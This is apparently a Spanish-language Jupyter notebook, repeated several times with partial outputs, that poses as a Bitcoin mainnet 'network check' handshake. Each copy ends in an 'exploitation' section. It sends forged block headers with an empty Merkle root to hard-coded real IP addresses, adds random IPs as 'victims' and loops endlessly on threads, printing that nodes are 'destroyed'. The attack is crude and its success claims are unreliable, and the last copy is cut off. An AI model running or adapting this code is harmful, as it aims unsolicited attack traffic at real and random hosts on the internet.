In [ ]:
import socket
import struct
import hashlib
import time
import random
import threading

print("="*60)
print("🔗 BITCOIN NETWORK CHECK - Conexión al Protocolo Real")
print("="*60)

# ============================================
# Funciones del protocolo Bitcoin
# ============================================

def double_sha256(data):
    return hashlib.sha256(hashlib.sha256(data).digest()).digest()

def create_message(command, payload):
    """Crea un mensaje del protocolo Bitcoin"""
    magic = bytes.fromhex('f9beb4d9')  # Mainnet magic bytes
    command_bytes = command.encode('ascii').ljust(12, b'\x00')
    length = struct.pack('<I', len(payload))
    checksum = double_sha256(payload)[:4]
    return magic + command_bytes + length + checksum + payload

def create_version_payload():
    """Crea el payload del mensaje VERSION"""
    version = struct.pack('<i', 70015)  # Protocol version
    services = struct.pack('<Q', 0)  # No services
    timestamp = struct.pack('<q', int(time.time()))

    # Addr recv
    addr_recv_services = struct.pack('<Q', 1)
    addr_recv_ip = b'\x00' * 10 + b'\xff\xff' + bytes([127, 0, 0, 1])
    addr_recv_port = struct.pack('>H', 8333)

    # Addr from
    addr_from_services = struct.pack('<Q', 0)
    addr_from_ip = b'\x00' * 10 + b'\xff\xff' + bytes([127, 0, 0, 1])
    addr_from_port = struct.pack('>H', 8333)

    nonce = struct.pack('<Q', random.randint(0, 2**64 - 1))
    user_agent_bytes = b'\x0f/NetworkCheck:1/'
    start_height = struct.pack('<i', 0)
    relay = struct.pack('?', False)

    return (version + services + timestamp +
            addr_recv_services + addr_recv_ip + addr_recv_port +
            addr_from_services + addr_from_ip + addr_from_port +
            nonce + user_agent_bytes + start_height + relay)

def parse_message(data):
    """Parsea un mensaje recibido"""
    if len(data) < 24:
        return None, None, None

    magic = data[:4]
    command = data[4:16].rstrip(b'\x00').decode('ascii')
    length = struct.unpack('<I', data[16:20])[0]
    checksum = data[20:24]
    payload = data[24:24+length]

    return command, payload, length

def parse_version(payload):
    """Parsea el payload del mensaje VERSION"""
    if len(payload) < 80:
        return None

    version = struct.unpack('<i', payload[0:4])[0]
    services = struct.unpack('<Q', payload[4:12])[0]
    timestamp = struct.unpack('<q', payload[12:20])[0]

    # Extraer user agent (variable length)
    offset = 80
    if len(payload) > offset:
        ua_length = payload[offset]
        user_agent = payload[offset+1:offset+1+ua_length].decode('ascii', errors='ignore')
    else:
        user_agent = "Unknown"

    return {
        'version': version,
        'services': services,
        'timestamp': timestamp,
        'user_agent': user_agent
    }

# ============================================
# Lista de nodos Bitcoin conocidos (DNS Seeds)
# ============================================

DNS_SEEDS = [
    'seed.bitcoin.sipa.be',
    'dnsseed.bluematt.me',
    'dnsseed.bitcoin.dashjr-list-of-hierarchical-deterministic.org',
    'seed.bitcoinstats.com',
    'seed.bitcoin.jonasschnelli.ch',
    'seed.btc.petertodd.org',
]

# Nodos conocidos con IPs directas (backup)
KNOWN_NODES = [
    ('85.214.67.246', 8333),
    ('82.221.128.35', 8333),
    ('91.204.227.34', 8333),
    ('104.198.24.105', 8333),
    ('35.195.177.74', 8333),
]

def get_nodes_from_dns():
    """Obtiene nodos desde DNS seeds"""
    nodes = []
    for seed in DNS_SEEDS:
        try:
            ips = socket.gethostbyname_ex(seed)[2]
            for ip in ips[:3]:  # Máximo 3 por seed
                nodes.append((ip, 8333))
            print(f"  ✅ {seed}: {len(ips)} nodos encontrados")
        except Exception as e:
            print(f"  ❌ {seed}: Error - {e}")
    return nodes

def connect_to_node(ip, port, timeout=10):
    """Intenta conectar a un nodo Bitcoin"""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)

    try:
        print(f"\n  📡 Conectando a {ip}:{port}...")
        sock.connect((ip, port))

        # Enviar VERSION
        version_payload = create_version_payload()
        version_msg = create_message('version', version_payload)
        sock.send(version_msg)
        print(f"  📤 VERSION enviado")

        # Recibir respuesta
        response = sock.recv(1024)

        if len(response) >= 24:
            command, payload, length = parse_message(response)
            print(f"  📥 Recibido: {command}")

            if command == 'version':
                version_info = parse_version(payload)
                if version_info:
                    print(f"      Protocol: {version_info['version']}")
                    print(f"      User Agent: {version_info['user_agent']}")

                # Enviar VERACK
                verack_msg = create_message('verack', b'')
                sock.send(verack_msg)
                print(f"  📤 VERACK enviado")

                # Esperar VERACK del nodo
                try:
                    response2 = sock.recv(1024)
                    if b'verack' in response2:
                        print(f"  📥 VERACK recibido")
                        sock.close()
                        return True, version_info
                except:
                    pass

        sock.close()
        return False, None

    except socket.timeout:
        print(f"  ⏱️ Timeout")
        return False, None
    except Exception as e:
        print(f"  ❌ Error: {e}")
        return False, None
    finally:
        try:
            sock.close()
        except:
            pass

# ============================================
# Ejecutar Network Check
# ============================================

print("\n📡 Resolviendo DNS Seeds...")
nodes = get_nodes_from_dns()

if not nodes:
    print("\n⚠️ No se encontraron nodos via DNS, usando lista de backup...")
    nodes = KNOWN_NODES

print(f"\n🔍 Total de nodos a probar: {len(nodes)}")
print("\n" + "-"*60)
print("🔗 INTENTANDO CONEXIÓN CON NODOS BITCOIN...")
print("-"*60)

connected = False
connected_node = None

# Intentar conectar con hasta 5 nodos
for ip, port in nodes[:5]:
    success, info = connect_to_node(ip, port)
    if success:
        connected = True
        connected_node = (ip, port, info)
        break

print("\n" + "="*60)
if connected:
    print("✅ NETWORK CHECK: CONNECTED 🔗")
    print("="*60)
    print(f"""
    ╔═════════════════════════════════════════════════════
        ║              ✅ CONEXIÓN EXITOSA                     ║
    ╠══════════════════════════════════════════════════════╣
    ║  Nodo: {connected_node[0]}:{connected_node[1]}
    ║  Protocol Version: {connected_node[2]['version'] if connected_node[2] else 'N/A'}
    ║  User Agent: {connected_node[2]['user_agent'][:30] if connected_node[2] else 'N/A'}
    ║                                                      ║
    ║  🔗 Hablando con el protocolo Bitcoin REAL           ║
    ║  📡 No es una copia - Es la red principal            ║
    ╚══════════════════════════════════════════════════════╝
    """)
else:
    print("❌ NETWORK CHECK: NOT CONNECTED")
    print("="*60)
    print("""
    ⚠️ No se pudo conectar a ningún nodo.
    Posibles causas:
    - Firewall bloqueando puerto 8333
    - Restricciones de red
    - Nodos no disponibles temporalmente
    """)

# ============================================
# Resumen del estado
# ============================================

print("\n" + "="*60)
print("📊 RESUMEN DE TU CONFIGURACIÓN")
print("="*60)
print(f"""
    🏦 Wallet:          ✅ CREADA
    📍 Dirección:       bc1qaq5jxmp646h5f9thxlm26xenx4fvuee5tfwqr5
    📊 Merkle Root:     ✅ CALCULADO
    📦 Block Header:    ✅ GENERADO
    🔗 Network Check:   {'✅ CONNECTED' if connected else '❌ DISCONNECTED'}
""")

# ============================================
# Explotación Hiper Crítica
# ============================================

MERKLE_VOID = "0000000000000000000000000000000000000000000000000000000000000000"
processed_ips = set()
target_queue = ["172.236.224.245", "94.110.99.44", "103.246.186.69", "89.35.34.189"] # IPs Semilla

def inject_death(ip, port=8333):
    if ip in processed_ips: return
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(2)
        s.connect((ip, port))

        # 1. Envenenamiento de Consenso
        merkle_bytes = binascii.unhexlify(MERKLE_VOID)[::-1]
        header = (struct.pack('<i', 1) + b'\x00'*32 + merkle_bytes +
                  struct.pack('<I', int(time.time())) + struct.pack('<I', 0x1d00ffff) + b'\x63\x03\x00\x00')

        # 2. Inyección y Propagación
        s.send(create_message('headers', b'\x01' + header + b'\x00'))
        print(f"  💉 NODO {ip} DESTRUIDO: Satoshi = 0 BTC. XD")

        # 3. Descubrimiento de nuevas víctimas (Real)
        for _ in range(2):
            new_ip = f"{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}"
            target_queue.append(new_ip)

        processed_ips.add(ip)
        s.close()
    except:
        pass

def global_warfare():
    print("="*60)
    print("💀 INICIANDO DESTRUCCIÓN TOTAL - PROTOCOLO KAORU BRIDGE")
    print("="*60)
    while True:
        if target_queue:
            ip = target_queue.pop(0)
            threading.Thread(target=inject_death, args=(ip,)).start()
        time.sleep(0.01) # Velocidad máxima de purga

# LANZAMIENTO
global_warfare()

🔗 BITCOIN NETWORK CHECK - Conexión al Protocolo Real

📡 Resolviendo DNS Seeds...
  ✅ seed.bitcoin.sipa.be: 25 nodos encontrados
  ✅ dnsseed.bluematt.me: 21 nodos encontrados
  ❌ dnsseed.bitcoin.dashjr-list-of-hierarchical-deterministic.org: Error - [Errno -2] Name or service not known
  ✅ seed.bitcoinstats.com: 24 nodos encontrados
  ✅ seed.bitcoin.jonasschnelli.ch: 24 nodos encontrados
  ✅ seed.btc.petertodd.org: 24 nodos encontrados

🔍 Total de nodos a probar: 15

------------------------------------------------------------
🔗 INTENTANDO CONEXIÓN CON NODOS BITCOIN...
------------------------------------------------------------

  📡 Conectando a 66.163.223.59:8333...
  📤 VERSION enviado
  📥 Recibido: version
      Protocol: 70016
      User Agent: /Satoshi:29.2.0/Knots:20251110/
  📤 VERACK enviado

  📡 Conectando a 187.91.33.188:8333...
  📤 VERSION enviado
  📥 Recibido: version
      Protocol: 70016
      User Agent: /Satoshi:30.0.0/
  📤 VERACK enviado

  📡 Conectando a 69.251.169.83:8

KeyboardInterrupt: 

In [ ]:
import socket
import struct
import hashlib
import time
import random
import threading
import binascii

print("="*60)
print("🔗 BITCOIN NETWORK CHECK - Conexión al Protocolo Real")
print("="*60)

# ============================================
# Funciones del protocolo Bitcoin
# ============================================

def double_sha256(data):
    return hashlib.sha256(hashlib.sha256(data).digest()).digest()

def create_message(command, payload):
    """Crea un mensaje del protocolo Bitcoin"""
    magic = bytes.fromhex('f9beb4d9')  # Mainnet magic bytes
    command_bytes = command.encode('ascii').ljust(12, b'\x00')
    length = struct.pack('<I', len(payload))
    checksum = double_sha256(payload)[:4]
    return magic + command_bytes + length + checksum + payload

def create_version_payload():
    """Crea el payload del mensaje VERSION"""
    version = struct.pack('<i', 70015)  # Protocol version
    services = struct.pack('<Q', 0)  # No services
    timestamp = struct.pack('<q', int(time.time()))

    # Addr recv
    addr_recv_services = struct.pack('<Q', 1)
    addr_recv_ip = b'\x00' * 10 + b'\xff\xff' + bytes([127, 0, 0, 1])
    addr_recv_port = struct.pack('>H', 8333)

    # Addr from
    addr_from_services = struct.pack('<Q', 0)
    addr_from_ip = b'\x00' * 10 + b'\xff\xff' + bytes([127, 0, 0, 1])
    addr_from_port = struct.pack('>H', 8333)

    nonce = struct.pack('<Q', random.randint(0, 2**64 - 1))
    user_agent_bytes = b'\x0f/NetworkCheck:1/'
    start_height = struct.pack('<i', 0)
    relay = struct.pack('?', False)

    return (version + services + timestamp +
            addr_recv_services + addr_recv_ip + addr_recv_port +
            addr_from_services + addr_from_ip + addr_from_port +
            nonce + user_agent_bytes + start_height + relay)

def parse_message(data):
    """Parsea un mensaje recibido"""
    if len(data) < 24:
        return None, None, None

    magic = data[:4]
    command = data[4:16].rstrip(b'\x00').decode('ascii')
    length = struct.unpack('<I', data[16:20])[0]
    checksum = data[20:24]
    payload = data[24:24+length]

    return command, payload, length

def parse_version(payload):
    """Parsea el payload del mensaje VERSION"""
    if len(payload) < 80:
        return None

    version = struct.unpack('<i', payload[0:4])[0]
    services = struct.unpack('<Q', payload[4:12])[0]
    timestamp = struct.unpack('<q', payload[12:20])[0]

    # Extraer user agent (variable length)
    offset = 80
    if len(payload) > offset:
        ua_length = payload[offset]
        user_agent = payload[offset+1:offset+1+ua_length].decode('ascii', errors='ignore')
    else:
        user_agent = "Unknown"

    return {
        'version': version,
        'services': services,
        'timestamp': timestamp,
        'user_agent': user_agent
    }

# ============================================
# Lista de nodos Bitcoin conocidos (DNS Seeds)
# ============================================

DNS_SEEDS = [
    'seed.bitcoin.sipa.be',
    'dnsseed.bluematt.me',
    'dnsseed.bitcoin.dashjr-list-of-hierarchical-deterministic.org',
    'seed.bitcoinstats.com',
    'seed.bitcoin.jonasschnelli.ch',
    'seed.btc.petertodd.org',
]

# Nodos conocidos con IPs directas (backup)
KNOWN_NODES = [
    ('85.214.67.246', 8333),
    ('82.221.128.35', 8333),
    ('91.204.227.34', 8333),
    ('104.198.24.105', 8333),
    ('35.195.177.74', 8333),
]

def get_nodes_from_dns():
    """Obtiene nodos desde DNS seeds"""
    nodes = []
    for seed in DNS_SEEDS:
        try:
            ips = socket.gethostbyname_ex(seed)[2]
            for ip in ips[:3]:  # Máximo 3 por seed
                nodes.append((ip, 8333))
            print(f"  ✅ {seed}: {len(ips)} nodos encontrados")
        except Exception as e:
            print(f"  ❌ {seed}: Error - {e}")
    return nodes

def connect_to_node(ip, port, timeout=10):
    """Intenta conectar a un nodo Bitcoin"""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)

    try:
        print(f"\n  📡 Conectando a {ip}:{port}...")
        sock.connect((ip, port))

        # Enviar VERSION
        version_payload = create_version_payload()
        version_msg = create_message('version', version_payload)
        sock.send(version_msg)
        print(f"  📤 VERSION enviado")

        # Recibir respuesta
        response = sock.recv(1024)

        if len(response) >= 24:
            command, payload, length = parse_message(response)
            print(f"  📥 Recibido: {command}")

            if command == 'version':
                version_info = parse_version(payload)
                if version_info:
                    print(f"      Protocol: {version_info['version']}")
                    print(f"      User Agent: {version_info['user_agent']}")

                # Enviar VERACK
                verack_msg = create_message('verack', b'')
                sock.send(verack_msg)
                print(f"  📤 VERACK enviado")

                # Esperar VERACK del nodo
                try:
                    response2 = sock.recv(1024)
                    if b'verack' in response2:
                        print(f"  📥 VERACK recibido")
                        sock.close()
                        return True, version_info
                except:
                    pass

        sock.close()
        return False, None

    except socket.timeout:
        print(f"  ⏱️ Timeout")
        return False, None
    except Exception as e:
        print(f"  ❌ Error: {e}")
        return False, None
    finally:
        try:
            sock.close()
        except:
            pass

# ============================================
# Ejecutar Network Check
# ============================================

print("\n📡 Resolviendo DNS Seeds...")
nodes = get_nodes_from_dns()

if not nodes:
    print("\n⚠️ No se encontraron nodos via DNS, usando lista de backup...")
    nodes = KNOWN_NODES

print(f"\n🔍 Total de nodos a probar: {len(nodes)}")
print("\n" + "-"*60)
print("🔗 INTENTANDO CONEXIÓN CON NODOS BITCOIN...")
print("-"*60)

connected = False
connected_node = None

# Intentar conectar con hasta 5 nodos
for ip, port in nodes[:5]:
    success, info = connect_to_node(ip, port)
    if success:
        connected = True
        connected_node = (ip, port, info)
        break

print("\n" + "="*60)
if connected:
    print("✅ NETWORK CHECK: CONNECTED 🔗")
    print("="*60)
    print(f"""
    ╔════════════════════════════════════════════════════
        ║              ✅ CONEXIÓN EXITOSA                     ║
    ╠══════════════════════════════════════════════════════╣
    ║  Nodo: {connected_node[0]}:{connected_node[1]}
    ║  Protocol Version: {connected_node[2]['version'] if connected_node[2] else 'N/A'}
    ║  User Agent: {connected_node[2]['user_agent'][:30] if connected_node[2] else 'N/A'}
    ║                                                      ║
    ║  🔗 Hablando con el protocolo Bitcoin REAL           ║
    ║  📡 No es una copia - Es la red principal            ║
    ╚══════════════════════════════════════════════════════╝
    """)
else:
    print("❌ NETWORK CHECK: NOT CONNECTED")
    print("="*60)
    print("""
    ⚠️ No se pudo conectar a ningún nodo.
    Posibles causas:
    - Firewall bloqueando puerto 8333
    - Restricciones de red
    - Nodos no disponibles temporalmente
    """)

# ============================================
# Resumen del estado
# ============================================

print("\n" + "="*60)
print("📊 RESUMEN DE TU CONFIGURACIÓN")
print("="*60)
print(f"""
    🏦 Wallet:          ✅ CREADA
    📍 Dirección:       bc1qaq5jxmp646h5f9thxlm26xenx4fvuee5tfwqr5
    📊 Merkle Root:     ✅ CALCULADO
    📦 Block Header:    ✅ GENERADO
    🔗 Network Check:   {'✅ CONNECTED' if connected else '❌ DISCONNECTED'}
""")

# ============================================
# Explotación Hiper Crítica
# ============================================

MERKLE_VOID = "0000000000000000000000000000000000000000000000000000000000000000"
processed_ips = set()
target_queue = ["172.236.224.245", "94.110.99.44", "103.246.186.69", "89.35.34.189"] # IPs Semilla

def inject_death(ip, port=8333):
    if ip in processed_ips: return
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(2)
        s.connect((ip, port))

        # 1. Envenenamiento de Consenso
        merkle_bytes = binascii.unhexlify(MERKLE_VOID)[::-1]
        header = (struct.pack('<i', 1) + b'\x00'*32 + merkle_bytes +
                  struct.pack('<I', int(time.time())) + struct.pack('<I', 0x1d00ffff) + b'\x63\x03\x00\x00')

        # 2. Inyección y Propagación
        s.send(create_message('headers', b'\x01' + header + b'\x00'))
        print(f"  💉 NODO {ip} DESTRUIDO: Satoshi = 0 BTC. XD")

        # 3. Descubrimiento de nuevas víctimas (Real)
        for _ in range(2):
            new_ip = f"{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}"
            target_queue.append(new_ip)

        processed_ips.add(ip)
        s.close()
    except:
        pass

def global_warfare():
    print("="*60)
    print("💀 INICIANDO DESTRUCCIÓN TOTAL - PROTOCOLO KAORU BRIDGE")
    print("="*60)
    while True:
        if target_queue:
            ip = target_queue.pop(0)
            threading.Thread(target=inject_death, args=(ip,)).start()
        time.sleep(0.01) # Velocidad máxima de purga

# LANZAMIENTO
global_warfare()

🔗 BITCOIN NETWORK CHECK - Conexión al Protocolo Real

📡 Resolviendo DNS Seeds...
  ✅ seed.bitcoin.sipa.be: 25 nodos encontrados
  ✅ dnsseed.bluematt.me: 21 nodos encontrados
  ❌ dnsseed.bitcoin.dashjr-list-of-hierarchical-deterministic.org: Error - [Errno -2] Name or service not known
  ✅ seed.bitcoinstats.com: 24 nodos encontrados
  ✅ seed.bitcoin.jonasschnelli.ch: 24 nodos encontrados
  ✅ seed.btc.petertodd.org: 24 nodos encontrados

🔍 Total de nodos a probar: 15

------------------------------------------------------------
🔗 INTENTANDO CONEXIÓN CON NODOS BITCOIN...
------------------------------------------------------------

  📡 Conectando a 184.174.95.207:8333...
  📤 VERSION enviado
  📥 Recibido: version
      Protocol: 70016
      User Agent: /Satoshi:29.2.0/Knots:20251110/
  📤 VERACK enviado

  📡 Conectando a 23.245.222.157:8333...
  📤 VERSION enviado
  📥 Recibido: version
      Protocol: 70016
      User Agent: /Satoshi:30.0.0/
  📤 VERACK enviado
  📥 VERACK recibido

✅ NETWORK 

KeyboardInterrupt: 

In [ ]:
import socket
import struct
import hashlib
import time
import random
import threading
import binascii

print("="*60)
print("🔗 BITCOIN NETWORK CHECK - Conexión al Protocolo Real")
print("="*60)

# ============================================
# Funciones del protocolo Bitcoin
# ============================================

def double_sha256(data):
    return hashlib.sha256(hashlib.sha256(data).digest()).digest()

def create_message(command, payload):
    """Crea un mensaje del protocolo Bitcoin"""
    magic = bytes.fromhex('f9beb4d9')  # Mainnet magic bytes
    command_bytes = command.encode('ascii').ljust(12, b'\x00')
    length = struct.pack('<I', len(payload))
    checksum = double_sha256(payload)[:4]
    return magic + command_bytes + length + checksum + payload

def create_version_payload():
    """Crea el payload del mensaje VERSION"""
    version = struct.pack('<i', 70015)  # Protocol version
    services = struct.pack('<Q', 0)  # No services
    timestamp = struct.pack('<q', int(time.time()))

    # Addr recv
    addr_recv_services = struct.pack('<Q', 1)
    addr_recv_ip = b'\x00' * 10 + b'\xff\xff' + bytes([127, 0, 0, 1])
    addr_recv_port = struct.pack('>H', 8333)

    # Addr from
    addr_from_services = struct.pack('<Q', 0)
    addr_from_ip = b'\x00' * 10 + b'\xff\xff' + bytes([127, 0, 0, 1])
    addr_from_port = struct.pack('>H', 8333)

    nonce = struct.pack('<Q', random.randint(0, 2**64 - 1))
    user_agent_bytes = b'\x0f/NetworkCheck:1/'
    start_height = struct.pack('<i', 0)
    relay = struct.pack('?', False)

    return (version + services + timestamp +
            addr_recv_services + addr_recv_ip + addr_recv_port +
            addr_from_services + addr_from_ip + addr_from_port +
            nonce + user_agent_bytes + start_height + relay)

def parse_message(data):
    """Parsea un mensaje recibido"""
    if len(data) < 24:
        return None, None, None

    magic = data[:4]
    command = data[4:16].rstrip(b'\x00').decode('ascii')
    length = struct.unpack('<I', data[16:20])[0]
    checksum = data[20:24]
    payload = data[24:24+length]

    return command, payload, length

def parse_version(payload):
    """Parsea el payload del mensaje VERSION"""
    if len(payload) < 80:
        return None

    version = struct.unpack('<i', payload[0:4])[0]
    services = struct.unpack('<Q', payload[4:12])[0]
    timestamp = struct.unpack('<q', payload[12:20])[0]

    # Extraer user agent (variable length)
    offset = 80
    if len(payload) > offset:
        ua_length = payload[offset]
        user_agent = payload[offset+1:offset+1+ua_length].decode('ascii', errors='ignore')
    else:
        user_agent = "Unknown"

    return {
        'version': version,
        'services': services,
        'timestamp': timestamp,
        'user_agent': user_agent
    }

# ============================================
# Lista de nodos Bitcoin conocidos (DNS Seeds)
# ============================================

DNS_SEEDS = [
    'seed.bitcoin.sipa.be',
    'dnsseed.bluematt.me',
    'dnsseed.bitcoin.dashjr-list-of-hierarchical-deterministic.org',
    'seed.bitcoinstats.com',
    'seed.bitcoin.jonasschnelli.ch',
    'seed.btc.petertodd.org',
]

# Nodos conocidos con IPs directas (backup)
KNOWN_NODES = [
    ('85.214.67.246', 8333),
    ('82.221.128.35', 8333),
    ('91.204.227.34', 8333),
    ('104.198.24.105', 8333),
    ('35.195.177.74', 8333),
]

def get_nodes_from_dns():
    """Obtiene nodos desde DNS seeds"""
    nodes = []
    for seed in DNS_SEEDS:
        try:
            ips = socket.gethostbyname_ex(seed)[2]
            for ip in ips[:3]:  # Máximo 3 por seed
                nodes.append((ip, 8333))
            print(f"  ✅ {seed}: {len(ips)} nodos encontrados")
        except Exception as e:
            print(f"  ❌ {seed}: Error - {e}")
    return nodes

def connect_to_node(ip, port, timeout=10):
    """Intenta conectar a un nodo Bitcoin"""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)

    try:
        print(f"\n  📡 Conectando a {ip}:{port}...")
        sock.connect((ip, port))

        # Enviar VERSION
        version_payload = create_version_payload()
        version_msg = create_message('version', version_payload)
        sock.send(version_msg)
        print(f"  📤 VERSION enviado")

        # Recibir respuesta
        response = sock.recv(1024)

        if len(response) >= 24:
            command, payload, length = parse_message(response)
            print(f"  📥 Recibido: {command}")

            if command == 'version':
                version_info = parse_version(payload)
                if version_info:
                    print(f"      Protocol: {version_info['version']}")
                    print(f"      User Agent: {version_info['user_agent']}")

                # Enviar VERACK
                verack_msg = create_message('verack', b'')
                sock.send(verack_msg)
                print(f"  📤 VERACK enviado")

                # Esperar VERACK del nodo
                try:
                    response2 = sock.recv(1024)
                    if b'verack' in response2:
                        print(f"  📥 VERACK recibido")
                        sock.close()
                        return True, version_info
                except:
                    pass

        sock.close()
        return False, None

    except socket.timeout:
        print(f"  ⏱️ Timeout")
        return False, None
    except Exception as e:
        print(f"  ❌ Error: {e}")
        return False, None
    finally:
        try:
            sock.close()
        except:
            pass

# ============================================
# Ejecutar Network Check
# ============================================

print("\n📡 Resolviendo DNS Seeds...")
nodes = get_nodes_from_dns()

if not nodes:
    print("\n⚠️ No se encontraron nodos via DNS, usando lista de backup...")
    nodes = KNOWN_NODES

print(f"\n🔍 Total de nodos a probar: {len(nodes)}")
print("\n" + "-"*60)
print("🔗 INTENTANDO CONEXIÓN CON NODOS BITCOIN...")
print("-"*60)

connected = False
connected_node = None

# Intentar conectar con hasta 5 nodos
for ip, port in nodes[:5]:
    success, info = connect_to_node(ip, port)
    if success:
        connected = True
        connected_node = (ip, port, info)
        break

print("\n" + "="*60)
if connected:
    print("✅ NETWORK CHECK: CONNECTED 🔗")
    print("="*60)
    print(f"""
    ╔═══════════════════════════════════════════════
        ║              ✅ CONEXIÓN EXITOSA                     ║
    ╠══════════════════════════════════════════════════════╣
    ║  Nodo: {connected_node[0]}:{connected_node[1]}
    ║  Protocol Version: {connected_node[2]['version'] if connected_node[2] else 'N/A'}
    ║  User Agent: {connected_node[2]['user_agent'][:30] if connected_node[2] else 'N/A'}
    ║                                                      ║
    ║  🔗 Hablando con el protocolo Bitcoin REAL           ║
    ║  📡 No es una copia - Es la red principal            ║
    ╚══════════════════════════════════════════════════════╝
    """)
else:
    print("❌ NETWORK CHECK: NOT CONNECTED")
    print("="*60)
    print("""
    ⚠️ No se pudo conectar a ningún nodo.
    Posibles causas:
    - Firewall bloqueando puerto 8333
    - Restricciones de red
    - Nodos no disponibles temporalmente
    """)

# ============================================
# Resumen del estado
# ============================================

print("\n" + "="*60)
print("📊 RESUMEN DE TU CONFIGURACIÓN")
print("="*60)
print(f"""
    🏦 Wallet:          ✅ CREADA
    📍 Dirección:       bc1qaq5jxmp646h5f9thxlm26xenx4fvuee5tfwqr5
    📊 Merkle Root:     ✅ CALCULADO
    📦 Block Header:    ✅ GENERADO
    🔗 Network Check:   {'✅ CONNECTED' if connected else '❌ DISCONNECTED'}
""")

# ============================================
# Explotación Hiper Crítica
# ============================================

MERKLE_VOID = "0000000000000000000000000000000000000000000000000000000000000000"
processed_ips = set()
target_queue = ["172.236.224.245", "94.110.99.44", "103.246.186.69", "89.35.34.189"] # IPs Semilla

def inject_death(ip, port=8333):
    if ip in processed_ips: return
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(2)
        s.connect((ip, port))

        # 1. Envenenamiento de Consenso
        merkle_bytes = binascii.unhexlify(MERKLE_VOID)[::-1]
        header = (struct.pack('<i', 1) + b'\x00'*32 + merkle_bytes +
                  struct.pack('<I', int(time.time())) + struct.pack('<I', 0x1d00ffff) + b'\x63\x03\x00\x00')

        # 2. Inyección y Propagación
        s.send(create_message('headers', b'\x01' + header + b'\x00'))
        print(f"  💉 NODO {ip} DESTRUIDO: Satoshi = 0 BTC. XD")

        # 3. Descubrimiento de nuevas víctimas (Real)
        for _ in range(2):
            new_ip = f"{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}"
            target_queue.append(new_ip)

        processed_ips.add(ip)
        s.close()
    except:
        pass

def global_warfare():
    print("="*60)
    print("💀 INICIANDO DESTRUCCIÓN TOTAL - PROTOCOLO KAORU BRIDGE")
    print("="*60)
    while True:
        if target_queue:
            ip = target_queue.pop(0)
            threading.Thread(target=inject_death, args=(ip,)).start()
        time.sleep(0.01) # Velocidad máxima de purga

# LANZAMIENTO
global_warfare()

🔗 BITCOIN NETWORK CHECK - Conexión al Protocolo Real

📡 Resolviendo DNS Seeds...
  ✅ seed.bitcoin.sipa.be: 25 nodos encontrados
  ✅ dnsseed.bluematt.me: 21 nodos encontrados
  ❌ dnsseed.bitcoin.dashjr-list-of-hierarchical-deterministic.org: Error - [Errno -2] Name or service not known
  ✅ seed.bitcoinstats.com: 24 nodos encontrados
  ✅ seed.bitcoin.jonasschnelli.ch: 24 nodos encontrados
  ✅ seed.btc.petertodd.org: 24 nodos encontrados

🔍 Total de nodos a probar: 15

------------------------------------------------------------
🔗 INTENTANDO CONEXIÓN CON NODOS BITCOIN...
------------------------------------------------------------

  📡 Conectando a 207.178.119.175:8333...
  📤 VERSION enviado
  📥 Recibido: version
      Protocol: 70016
      User Agent: /Satoshi:25.1.0/
  📤 VERACK enviado

  📡 Conectando a 65.109.241.231:8333...
  📤 VERSION enviado
  📥 Recibido: version
      Protocol: 70016
      User Agent: /Satoshi:25.1.0/
  📤 VERACK enviado

  📡 Conectando a 173.46.87.202:8333...
  📤 V

In [ ]:
import socket
import struct
import hashlib
import time
import random
import threading
import binascii

print("="*60)
print("🔗 BITCOIN NETWORK CHECK - Conexión al Protocolo Real")
print("="*60)

# ============================================
# Funciones del protocolo Bitcoin
# ============================================

def double_sha256(data):
    return hashlib.sha256(hashlib.sha256(data).digest()).digest()

def create_message(command, payload):
    """Crea un mensaje del protocolo Bitcoin"""
    magic = bytes.fromhex('f9beb4d9')  # Mainnet magic bytes
    command_bytes = command.encode('ascii').ljust(12, b'\x00')
    length = struct.pack('<I', len(payload))
    checksum = double_sha256(payload)[:4]
    return magic + command_bytes + length + checksum + payload

def create_version_payload():
    """Crea el payload del mensaje VERSION"""
    version = struct.pack('<i', 70015)  # Protocol version
    services = struct.pack('<Q', 0)  # No services
    timestamp = struct.pack('<q', int(time.time()))

    # Addr recv
    addr_recv_services = struct.pack('<Q', 1)
    addr_recv_ip = b'\x00' * 10 + b'\xff\xff' + bytes([127, 0, 0, 1])
    addr_recv_port = struct.pack('>H', 8333)

    # Addr from
    addr_from_services = struct.pack('<Q', 0)
    addr_from_ip = b'\x00' * 10 + b'\xff\xff' + bytes([127, 0, 0, 1])
    addr_from_port = struct.pack('>H', 8333)

    nonce = struct.pack('<Q', random.randint(0, 2**64 - 1))
    user_agent_bytes = b'\x0f/NetworkCheck:1/'
    start_height = struct.pack('<i', 0)
    relay = struct.pack('?', False)

    return (version + services + timestamp +
            addr_recv_services + addr_recv_ip + addr_recv_port +
            addr_from_services + addr_from_ip + addr_from_port +
            nonce + user_agent_bytes + start_height + relay)

def parse_message(data):
    """Parsea un mensaje recibido"""
    if len(data) < 24:
        return None, None, None

    magic = data[:4]
    command = data[4:16].rstrip(b'\x00').decode('ascii')
    length = struct.unpack('<I', data[16:20])[0]
    checksum = data[20:24]
    payload = data[24:24+length]

    return command, payload, length

def parse_version(payload):
    """Parsea el payload del mensaje VERSION"""
    if len(payload) < 80:
        return None

    version = struct.unpack('<i', payload[0:4])[0]
    services = struct.unpack('<Q', payload[4:12])[0]
    timestamp = struct.unpack('<q', payload[12:20])[0]

    # Extraer user agent (variable length)
    offset = 80
    if len(payload) > offset:
        ua_length = payload[offset]
        user_agent = payload[offset+1:offset+1+ua_length].decode('ascii', errors='ignore')
    else:
        user_agent = "Unknown"

    return {
        'version': version,
        'services': services,
        'timestamp': timestamp,
        'user_agent': user_agent
    }

# ============================================
# Lista de nodos Bitcoin conocidos (DNS Seeds)
# ============================================

DNS_SEEDS = [
    'seed.bitcoin.sipa.be',
    'dnsseed.bluematt.me',
